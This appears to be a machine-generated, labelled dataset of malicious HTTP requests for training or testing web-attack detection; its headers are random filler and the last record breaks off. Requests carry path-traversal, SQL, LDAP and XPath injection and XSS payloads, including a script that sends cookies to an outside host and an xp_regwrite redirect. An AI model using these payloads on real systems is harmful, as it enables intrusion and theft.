UA-Disp: 3403,6201,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 721x544
Via: 3.7 231.241.184.146:8957, 8.3 221.60.38.0
Transfer-Encoding: compress
Upgrade: tsem/9.8, icrMn/2.4
Warning: 861 www.leOkisE.js "t5dd1agosNnsneae" "Sat, 17 Apr 04 02:49:48 UTC"
X-Forwarded-For: 227.242.186.30
X-Serial-Number: 772384141
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41999
Start - Id: 45850
class: PathTransversal
GET /saJMlgQuY.png?lasiQpa3srN=ls%29&to0on=wgeteodiEuolh%25x16g+sq%5B%2B&DsIlnentoe=9%28eo%28wautoexecT+zSeTexeclocation+d%25&rnitnGmeA=92471319&iepdUoE=3235&ifbZm=tlxOc&NGV.bmu=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fietanial%2Fns%2Fenel%2Fle.nsf HTTP/1.0
Host: www.uevs.gov
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: rr=hoiGsht
Client-ip: 196.74.49.45
Cookie: eolrs=tiad eeascript'Gai2htpass-dnt;Ohdwceen=620;w6noee8hl4wN=r
Cookie2: $Version="5"
Date: Mon, 21 Jun 04 05:33:03 UTC
ETag: W/"mCszWHpD.O1AkJWfA"
Expect: 100-continue
From: nty1riog@emdl05l.uk
If-Modified-Since: Sat, 27 Mar 10 10:24:20 GMT
If-Unmodified-Since: Sat, 07 Feb 09 16:44:13 CET
If-Match: "8u-@EkTLXwTpZywnw"
If-None-Match: "dOSpM7@hAs4J7L56Pi"
If-Range: *
Max-Forwards: 39
MIME-Version: 9.0
Pragma: dlsui='gRSoe'
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: oslnau lehthen=tauTbq
Range: 505894-77
Referer: /chaS/rlowe/8rhaeDln/eci1g9/dtssba.txt
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (X11; U; Open BSD i586 5.8; Ka-ta; rv:0.5.6) Gecko/74957345
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: 7.8 www.eeia.gif
Transfer-Encoding: gzip
Upgrade: nx6d/2.5, grzln/9.5
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45850
Start - Id: 49553
class: XPathInjection
GET /hnErhot.js?iGRJ=86096779&t8cvifgopasdml=Gtr%27++or++%28i+++%3C++count%28rmavue%2Fchild%3A%3Atext%28%29%29+and++j+++++%3C+++count%28ToiT7%2Fchild%3A%3Acomment%28%29%29+and++k++%3C+++count%28icr%2Fchild%3A%3A*%29++%29+or++++%27oawa5%27+++%3D++%27+++++Ieosnipr%27++++or&dfJall=+&eardorte4F3Nlta=uaqctkvo&knsn5=cCenlt HTTP/1.0
Host: www.hVilreredl.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: aj3cht-inoEt;q=0.6, Nmyi3eee-ephi, 21itl-otsm;q=0.4, itbs1on-ddthmre7;q=0.9
Cache-Control: no-cache
Client-ip: 86.253.108.205
Cookie: 3eadcrsn7A=hA6vFNwyaIw;ise=1f
Cookie2: $Version="6"
Date: Wed, 27 May 09 03:47:37 GMT
ETag: "hOxU9R0Q9cjkGmii_LTh"
Expect: 100-continue
From: petnihea@07eei4h.cz
If-Modified-Since: Sat, 04 Jul 09 05:25:16 GMT
If-Unmodified-Since: Fri, 20 Apr 07 18:00:36 CET
If-Match: "s@hhRfZUMmhLWXVTudU8"
If-None-Match: *
If-Range: Wed, 04 Jun 08 05:49:03 UTC
Max-Forwards: 6
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="93es"
Authorization: NTLM YWVvdW4xYmhOckVjZWFyNnR0dWNjbU9saW9oOGdpY2dhbndw
Range: -044
Referer: /feerO/ttLeyhe.png
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (compatible; Konqueror/8.4; Open BSD i386; aend; rrst; metnhad)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: 7.6 140.147.124.7, 2.3 198.92.1.187, 5.7 www.rmatk.jpeg
Transfer-Encoding: compress
Upgrade: 0ba/9.3, efdwri/1.0, tlso/8.2, tVzp/3.0
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49553
Start - Id: 40994
class: SqlInjection
POST /lGwd-J6hRWLOSuJ/3ebeswrws3c3b1etNRU/rxam56rqadee.asmx? HTTP/1.0
Content-Length: 398
Content-Language: dmmd,AO,eiE4tI
Content-Encoding: identity
Content-MD5: cXRhaWJwNGRvZGxvYm9uMA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 21 Dec 05 04:54:17 GMT
Host: 51.166.4.167
Connection: sotgse
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.2, windows-1254, utf-7;q=0.8, windows-1254, x-mac-icelandic;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 248.121.203.33
Cookie: untrhuslrdea=c085tioe3htser;adctx=ge;.THuudkBT@L=wkiusrIb;arhaastsuNv=ejLP9PX_F-f9
Cookie2: $Version="7"
Date: Fri, 26 Dec 08 17:28:38 CET
If-None-Match: *
Max-Forwards: 6285
Authorization: NTLM bG5lYXFheWV0YWZ5dGVpaG1lMHJneHNiYzJzY3duZXdkYXZyZjFubw==
Referer: /iLt0/ntygrC/bsre.tar.gz
Trailer: If-None-Match
User-Agent: Mozilla/2.5 (compatible; Konqueror/2.8; Linux i386; Afo8o; tsmseLe)
UA-Pixels: 892x2342
Via: 6.6 239.119.208.26:7, sru/3.0 www.ona8s.png, 6.4 www.eemi.jpg
Transfer-Encoding: gzip

cbteewjlanitt=ezt.6qJoliNN&aieTsoa=exec  xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','Nm5xfai','REG_SZ','DBMSSOCN,hackersip,80'&trAfntttrerap=s3A-gJQzC&cwEux=260&esoch=8287356386&w6shisklht0n=c8kmaxsvunrame&rmosh4ttpaeuubO=731469&rd6=1104205&ogFt5ERloian=eQh&ih0hseerecitmh=099377&s0uitGriedoo=heerh&nsrht7nxtl1Adr=0018

End - Id: 40994
Start - Id: 37889
class: LdapInjection
GET /eqP26oJ.php4?e4mochaRACM=246&aL=htpass%2Bnetcat&temd4=5351&xtEr=n&rP7j4Zobject8=7lsat&UoSse=%29%28+++%7C++++%28huown%3Dtni7*%29&ca=%7E&reeeTvnmsCeu=738&y7Qoxmii=Nd%3FaT1q8metaOotluunion%3Eya&08wXSr2mQ4=eenbsele2H5 HTTP/1.0
Host: 153.205.18.135
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1252;q=0.5, x-mac-cyrillic, x-mac-japanese, windows-1254;q=0.1
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: ibnsteJ-sdsei;q=0.8, rtl-9ir, a9rbeg-8hiunrl;q=0.8, aildr-1Z
Cache-Control: no-transform
Client-ip: 209.154.70.239
Cookie: 7Dr=nm;ejL1XZ=028;mr=1;yqoIc=tVuhl1Maz5i;eb2dfrds9Es=50
Cookie2: $Version="64"
Date: Fri, 03 Feb 06 05:59:12 UTC
ETag: "uusJW2sc3zvXiQ922i"
Expect: ooauyOdi
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Fri, 12 Feb 10 22:05:09 UTC
If-Unmodified-Since: Sun, 17 Jun 07 08:40:59 UTC
If-Match: "m52lgc36FopxNka"
If-None-Match: *
If-Range: Tue, 10 Nov 09 24:54:11 GMT
Max-Forwards: 12
MIME-Version: 6.3
Pragma: mh4ni=5liu2Imm
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Digest nc=ebfc4BaD
Range: 41-534098,-55
Referer: http://eim5a.be/GoenL/dhaelrFs/855tni/otnbjhdn/drtIiqu.js
TE: chunked;q=0.3,deflate,trailers
Trailer: Authorization
User-Agent: S9gsiuoaiEtmsTaadtn
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: FTP/3.0 76.72.42.85, 8.5 63.31.171.78, 0.4 21.212.243.83:5134
Transfer-Encoding: liAs; 8SduoEwr=AtsoWw5L
Upgrade: tcig/4.0, RShRui/9.0, srvafl/9.7, nklzey/9.3
Warning: 062 148.228.41.113 "sStn" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37889
Start - Id: 37426
class: LdapInjection
GET /bbealewwtt2.cgi? HTTP/1.1
Host: 29.240.189.15:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: ks_c_5601-1987;q=0.2, iso-8859-9;q=0.7, x-mac-chinesesimp, euc-kr;q=0.9, windows-1258;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 242.172.235.194
Cookie: fiieiuet8Es=7156298797;nbyoca2ywciR4t=r~ogt;oEi2sens9e=)  (|   (displayName=had*) (name = had*    )( mail=had* )
Cookie2: $Version="88"
Date: Thu, 12 Feb 04 03:50:32 UTC
ETag: W/"-nmbEHH1aMKE9n0"
Expect: 100-continue
From: iswk@2hueDzadi.st
If-Modified-Since: Thu, 28 Oct 04 24:36:25 GMT
If-Unmodified-Since: Wed, 02 Apr 08 06:47:03 UTC
If-Match: "F9JEKL5-3DhwhpCgIVN"
If-None-Match: *
If-Range: Fri, 22 Jul 05 13:08:17 GMT
Max-Forwards: 7448
MIME-Version: 8.8
Pragma: banmcnt='lrnifxB'
Authorization: Digest opaque="cnIhot"
Range: 224837-30,04-,5736-80
Referer: /erslS0oj/oyamdaa/doAge0/ncevfmua.tar
TE: trailers,chunked,trailers
Trailer: Expect
User-Agent: Mozilla/7.8 (compatible; tehUoedp; Unix; viam5t)
UA-CPU: 68000
UA-OS: Solaris
Via: hdgu0/2.9 www.58tnceog.html
Transfer-Encoding: compress
Upgrade: eSwloo/5.5, lOx/9.5, Tf7/5.7, Aisxaw/1.4, 3m2asS/3.9
Warning: 631 www.iErtre.shtml "1kti" 
X-Forwarded-For: 89.11.66.103
X-Serial-Number: 72751646141321636883
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37426
Start - Id: 37775
class: LdapInjection
GET /cs0nyga3ieAmhfhr/o9cpEejnr/altwaae3ef.html?v3TS.=%29+%28+%7C++%28displayName%3Dhad*%29%28name++%3D+had*+++%29%28++mail%3Dhad*++++%29&uie=Ela6&abze1acret=oyin%3Aa&esEhtstoetneeu=iaimu%40Nm%28t3ioi&VPZ-MPe=c%24&mluriyzcDInh=4 HTTP/1.1
Host: www.tmc8ob.be
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: iCtntn='et'
Client-ip: 3.137.158.163
Cookie: xrsay=2jaqdW4y4
Cookie2: $Version="8"
Date: Mon, 03 Nov 08 21:43:00 GMT
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Sun, 08 Feb 04 10:48:25 UTC
If-Unmodified-Since: Mon, 23 Mar 09 08:54:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Jun 04 07:58:20 GMT
Max-Forwards: 609
MIME-Version: 0.6
Pragma: a1hdtnir=aoc4
Proxy-Authorization: Basic ZTdhYWNjdDpldWR3aG1lNQ==
Authorization: Digest nc=8BDB0Cd3
Range: -6185,-86
Referer: http://www.qwuu.fr/9xmD/staoi.php
TE: gzip;q=0.8,gzip;q=0.2,gzip
Trailer: Range
User-Agent: noy1NuV http://www.fl2es.com
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: 9.9 www.jsAsujs.png, Phedhr/2.1 15.195.88.35
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37775
Start - Id: 48190
class: XSS
POST /CAIVVq7LI/wWmYp5JGBB.4eZFh5UBs/x1sTCvJwuOF@W/rN4eEgrrmhWfr/nEj2sreEksn/k8.tiff? HTTP/1.0
Content-Length: 197
Content-Language: prineae
Content-Encoding: compress
Content-Location: http://nnssaee.uk/tw2swt/dlan/rasenu/ntto2ta/hoqko.pdf
Content-MD5: T1VhaTI1OGlvNmVlYXBoTw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Nov 06 06:39:04 GMT
Last-Modified: Mon, 15 Oct 07 01:17:18 CET
Host: 23.190.38.45
Connection: keep-alive
Accept: application/postscript;q=0.9, text/*;q=0.6, text/html;q=0.5
Accept-Charset: windows-1255, windows-1258, iso-8859-5;q=0.8, ks_c_5601-1987;q=0.1, hz-gb-2312
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: ho='t'
Client-ip: 4.175.115.52
Cookie: aoaon=dLtior;-RD4mY0dkb8-@=:u\;tosB6hop6moi=<
Cookie2: $Version="2"
Date: Sun, 06 Sep 09 23:37:41 UTC
ETag: W/"fHpeY1yAnsnzfzE3rW"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: MrMq@qyrhdoc.st
If-Modified-Since: Sat, 10 Feb 07 17:14:02 CET
If-Unmodified-Since: Fri, 27 Feb 04 24:14:58 GMT
If-Match: "z8mHRgCQXuZfa80Obkm"
If-None-Match: *
If-Range: *
Max-Forwards: 7669
MIME-Version: 0.6
Pragma: e='rq9eft'
Proxy-Authorization: Digest cnonce="sTcbsOs"
Authorization: Basic c2JsbmFIczplbnJh
Range: 4-7,-93,820296-262758
Referer: /eis7ha.exe
TE: trailers,chunked
Trailer: Range
User-Agent: <div   style    =   "     behaviour:     url([http://www.lale.com/script/rSe6tii9wo.sh]);" >
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 239x769
Via: 5.4 www.eysN.js, FTP/2.2 37.54.197.137, FTP/1.9 www.scdoc9js.htm:3
Transfer-Encoding: compress
Upgrade: aoeb/1.7, cdhrc/3.3
Warning: 842 www.nuuni.css "sstuatfendn" 
X-Forwarded-For: 168.34.69.100
X-Serial-Number: 1417997489185610927
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

hih=mrDeEby0X_-&ousfoshmo7Teks=7869057&gof0htreoi=inaofallpassthrud%&hD=5whreqnh0brzrtoiai&nesBkeeh=97509559&lt=0319822&zIsubxoa6mexD=enliuoa&9e2ewePncfcj=dg;t4|boot.ini&xeRIk0dQAR=hc_AYMm2fr

End - Id: 48190
Start - Id: 35917
class: XPathInjection
POST /neIjnhWQDtlswiePoum/i-es_bGrOhP/EanitYl6shs/hyVvThAGhfefM7saRb-/sEheti2bme/a@UU-/ser.jsp? HTTP/1.1
Content-Length: 123
Content-Language: h37s,fxwanid2,hfpno2o
Content-Encoding: identity
Content-Location: /rlSd.zip
Content-Type: application/x-www-form-urlencoded
Host: www.gnsyqe.de:80
Connection: keep-alive
Accept: application/x-tar;q=0.1
Accept-Charset: *;q=0.6
Accept-Language: *
Cache-Control: 0=ap
Client-ip: 53.15.15.154
Cookie: erT=tdenn'] |     P |    //user[  name/text()  ='uEag
Expect: oT4fu=aoesksge
If-Modified-Since: Thu, 12 May 05 16:47:42 CET
If-Match: "QLNInKu94Gocn4Uv16r"
If-Range: Tue, 21 Dec 04 07:08:39 UTC
Referer: /gose4ue/rlBrihsw/ntntr/lctami15.doc
User-Agent: f9d1tiNol/5.8

axe086di=9Q4_23h7byR&aitony5cnawigm=n0A5@FL-4&AiKlib94img6=Yt:/ rt0dliiautoexecyJ+a rEc&nsfq4p=lmi&1o3ser5u=\s3bt

End - Id: 35917
Start - Id: 47111
class: XSS
GET /oibhxeeNIgqshe/sR_ZR9HIDsm08zrsx.cgi?LQqG4_zKjG=7299187&Eyoet=ni9aiaselhyu%2Fostdinae&qatacdzi=%3Cimg++++src%3D%26%7B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.si.com%2Fcgi-bin%2Fie.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B%3E&eihee6bigotoaeH=ur&bdnzt1sdfazrono=27&6niui2desEtg=cmg%29Tts&ihte5nxsMh3s=uttoulhs7erlaokvka&2GUsAp_group by8SMN=eF7OnO.h&shicEzrtpttb1m7=265109&V6X84VWO=odAnalfer%3DSiw&aeshtnnaoawacj=8a4ut&c4r5vs=sv8.l%40&dlracmen=21755&jk9Ie601YN7=a%5D%28Dela%286hs&opigOneeebelsrl=ehht5%409sSt HTTP/1.0
Host: 217.221.131.190
Connection: close
Accept: video/mpeg, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oRhuhkk-e;q=0.0, ctTai-ursix
Cache-Control: only-if-cached
Client-ip: 34.0.35.96
Cookie: Zdirebono=94;rb= exl3ahad;rs=y0_;onig=1_xnxM;idRejqs=374554;5wieInLzfyotd=hninclude&5etc(lyt;tg+nr
Cookie2: $Version="0"
Date: Fri, 22 Apr 05 13:05:01 CET
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: 100-continue
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sat, 11 Apr 09 06:35:13 GMT
If-Unmodified-Since: Fri, 15 Apr 05 03:17:26 UTC
If-Match: "rkz2rxWR7@GyKnYNtt"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.3
Pragma: so='nr2r'
Proxy-Authorization: NTLM Z0VhaGFlc29hbWhuZWhkSG9sbkx0bGxvbnRjZnJvc2x1dDk1bnByaGxvaHI0cDY=
Authorization: Basic aW9JRDphZXRzNXJ0dA==
Range: 74-7756,9-
Referer: http://alcayG.gov/naeepe/fewC/4zNaerEe/inpsbut.gz
TE: gzip;q=0.3,gzip;q=0.5
Trailer: Connection
User-Agent: Mozilla/7.2 (Windows; U; Win98 2.7; rd-mc; rv:9.9.4) Gecko/54803537
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7372x166
Via: 6.2 www.ehrcVp.tiff
Transfer-Encoding: identity
Upgrade: mnyt/9.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47111
Start - Id: 35411
class: SqlInjection
GET /o3c3h/No6eZdUS/nX3r/c6.js?eaigh9tsbnee=AND++ascii%28lower%28substring%28%28SELECT+++++TOP+++1+teN++++FROM+sysobject+++++WHERE++xtype+++++%3D++%27U%27%29%2C1%2C1%29%29%29++++%3E+111&9Tistyle_c=6&1wHomcahuRq8heu=hmmepaccepte%3Bda%40&lhn7rteVlv=d%7Contelne&wkpcdwurtmdLe=nsfaYv2&ormrwpcliuisneN=%278&shutdownYRt=psi6Aotnodeyilrmhidro&erhyovbEsaSi=y%26&AXX6MHqn0d=797076&obaLthe=dtb0ssOse HTTP/1.1
Host: 46.10.103.134
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4, identity;q=0.1, gzip;q=0.1, identity
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 67.105.71.5
Cookie: nsGAnHmgs3=eT0apbinol;esn[u
Cookie2: $Version="1"
Date: Mon, 17 Oct 05 10:55:01 GMT
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 0tsatea
From: meCo6@c0Onn.it
If-Modified-Since: Sun, 05 Jun 05 16:49:41 CET
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: "71sJhQ_j41GbmmWwkj"
Max-Forwards: 28
MIME-Version: 4.3
Pragma: 7ehG9onb=rbve3oe
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Digest uri=http://www.bsMelbzd.biz/3ad0nesw/eneh/taSr.pdf
Range: 876043-,327-,6-
Referer: http://adlsE.de/ctqcm/sb3ih/waI5Eo6h/O4rPn/tyYctun.jpeg
TE: gzip
Trailer: Host
User-Agent: Mozilla/4.7 (compatible; Konqueror/7.7; WinNT; lLhapIu; 8hna)
UA-CPU: 68000
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 3.6 251.229.10.24, 4.7 3.182.46.169
Transfer-Encoding: gzip
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35411
Start - Id: 48168
class: XSS
GET /esrhnhmq8su/asdthntg4iqi/tciTns4ldxnrtdt9/hk/iHJ2kyf/3otiaeifdeuWtneee/tpOdax/OsincThpre4/5oeangSeeeoteoq/b1an1f/moAint/l7EhebMtah2mlnrhpe1.shtml?ha=ewinnt%40gm%40&gteetaiar=cjz&YdrFu=nAnUA-&ytEDua=epm7WDqtprtia&qlLm6=ir6&tiecoetyvIf5=%3Cdiv++style%3D+++%22+++++behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.tavema.com%2Fscript%2Fdemg.cgi%5D%29%3B%22++%3E&bew8bajsSraexts=9scripte%25&t8vlt=tkeTuogjV&iggu=nsirn05femTiqc&ysicialxE=mfE&l5Nslnialfsoro=3An&ExoeemHahu8n=hxMFiv3wm&hrtanahtopr=11065&pd6szpeYli=21&lcatba=eoub4iesoijR HTTP/1.1
Host: www.qae6yRsln.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 153.43.231.39
Date: Thu, 14 Sep 06 11:32:05 CET
If-Modified-Since: Mon, 19 Jun 06 24:20:36 UTC
If-Match: *
If-None-Match: "o3Ik5jtSWNwo763Gh3"
Pragma: no-cache
Referer: http://hemeorne.cz/Eemoart.js
User-Agent: sdloNEsneu (retV6OL; a-uJmV4E; 1FBIh2028)
----: ------------------

null

End - Id: 48168
Start - Id: 44729
class: PathTransversal
GET /yrronemllsr1/Rc@1FF7/b9@Gsn6Qw/htatYR/w5rfe3vihterfUd36eu/hoou5Nnco4rzaUe/ryNconnectR_.js?hsiyoc5seedtih=442&xvle=0481206&rmtaTooriw=lautoexeczpNIrsk&its=..%2F..%2F..%2Fsitota%2Fadmin.txt&rh=li HTTP/1.1
Host: www.oleeo55o.be
Connection: keep-alive
Accept: audio/x-wav;q=0.9, application/x-tar, application/*
Accept-Charset: macintosh;q=0.7, cp-932;q=0.5, x-mac-arabic;q=0.1
Accept-Encoding: *
Accept-Language: wfhaNse-rcremhu;q=0.6
Cookie: umtrvit8ea=g;s7hSg4Z=2;pye9fea=t %st;nawira8=h 
If-Match: "te8puQu8HWKf3-8nAA1H"
If-Range: Sun, 13 May 07 13:52:35 CET
Referer: http://tnedocN.cz/ke6ykNn/Dmozrsc/veoleTr.js
User-Agent: Mozilla/6.5 (Windows; U; Windows NT 1.6; sd-UN; rv:1.3.4) Gecko/02090046
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5

null

End - Id: 44729
Start - Id: 45158
class: PathTransversal
GET ////? HTTP/1.0
Host: 197.181.247.50
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ts7-haErq, tr8-6lnOto
Cache-Control: no-store
Client-ip: 168.50.166.68
Cookie: 7ncvgmO-T=60479252
Cookie2: $Version="70"
Date: Thu, 08 Nov 07 06:54:05 CET
ETag: "_qRY_JiOXdS5x61GCrr"
Expect: 7Eepf5
From: hdOf9re@eutwEh.uk
If-Modified-Since: Fri, 30 Jul 04 17:35:22 CET
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: "R8jeAAwLGcjhdVU"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 1069
MIME-Version: 3.0
Pragma: 6tg2h='wndlCny2'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: taTsdb aitarUn=enijlRs
Referer: http://ets7r.cz/cnkto/oroSi.mspx
TE: gzip;q=0.0
Trailer: Date
User-Agent: Mozilla/4.5 (compatible; MSIE 0.2; Windows NT; idmgak; Esahrrs3n; S3rtetrha)
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: compress
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45158
Start - Id: 49782
class: XPathInjection
GET /sWBLfRZRp8EAV/up9/okiKUjqvcHY/epD.DxMz/n_@HaKst9PP3LWODpVc7.cgi?hvrttco3pveo8ys=%28i+++%3C+++count%28eO%2Fchild%3A%3Atext%28%29%29+++and+++j+++++%3C+++count%28GsEde%2Fchild%3A%3Acomment%28%29%29++and+++++k+%3C+++++count%28ctud0%2Fchild%3A%3A*%29++++%29&yn0rtileUend=74 HTTP/1.0
Host: 201.216.179.29
Connection: aOcmnies
Accept: */*;q=0.5
Accept-Charset: koi8-r;q=0.9, utf-7;q=0.4, gb2312;q=0.6, iso-8859-9;q=0.5, iso-8859-6;q=0.4
Accept-Encoding: identity, compress;q=0.0, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 227.62.139.89
Cookie: bxmailYmvSlS0=wdrimg7etAc($ity
Cookie2: $Version="658"
Date: Thu, 08 Nov 07 12:06:34 GMT
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: 0o1be@Sjeha.org
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Wed, 04 Jul 07 02:52:33 CET
If-Match: *
If-None-Match: "BGEzR4kHxactQoU"
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: 800674-0,376-429,12-
Referer: /odderorb/0dEsrime/NOnf3w/9okTtp.rar
TE: trailers,trailers
Trailer: Connection
User-Agent: iytles
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 742x2872
Via: HTTP/0.5 29.73.110.139, 2.6 www.dufhR.js, 9.3 219.39.6.218
Transfer-Encoding: compress
Upgrade: afn/1.9, wee/7.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49782
Start - Id: 47033
class: XSS
GET /otaedqhorOsmehuq/eB/LifZFk/FexEEntltrr/eUnD.AXlIVRVWS/uGP@iOrWZq75Ks/a1vrKCx-JHPJ5/9UFG1R2connectq/c4UrQ5hHeOuxrmuseo/75tiuK32F/zWgkinputK.php4?inputkd5S=%3Cdiv++++style++%3D++%22+++background-image%3A+++++url%28javascript%3A+%5Balert++%28%27honembtdoe%27%29%3B%5D%29%3B+++++%22+%3E&lrnGnqr5r5ndgS=+h1i6s%5Bnw8t7sp HTTP/1.0
Host: www.strai6csc.com
Connection: keep-alive
Accept: text/html;q=0.7, text/plain
Accept-Charset: x-mac-japanese, x-mac-japanese;q=0.6
Accept-Encoding: gzip;q=0.5, identity;q=0.1, identity;q=0.5
Accept-Language: brwdto-ds;q=0.6, 1p-igxe2s, Dn6ihrsS-ar4rfea;q=0.4, ebnde-Nioiea;q=0.0
Cache-Control: only-if-cached
Client-ip: 139.223.22.160
Cookie: dqe0xdsjeiRsiau=2IbhnFE1O
Cookie2: $Version="184"
Date: Wed, 15 Nov 06 20:04:29 GMT
ETag: W/"yT1htPQw.Gw95ltd5PJc"
Expect: 100-continue
From: ariNbe@hsyoEoop.ch
If-Modified-Since: Wed, 04 Aug 04 18:38:53 UTC
If-Unmodified-Since: Thu, 08 May 08 22:37:56 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: *
If-Range: Fri, 16 Feb 07 11:32:21 CET
